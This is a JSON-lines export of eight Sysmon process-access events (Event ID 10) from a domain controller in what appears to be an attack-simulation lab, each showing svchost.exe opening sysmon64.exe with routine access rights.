{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
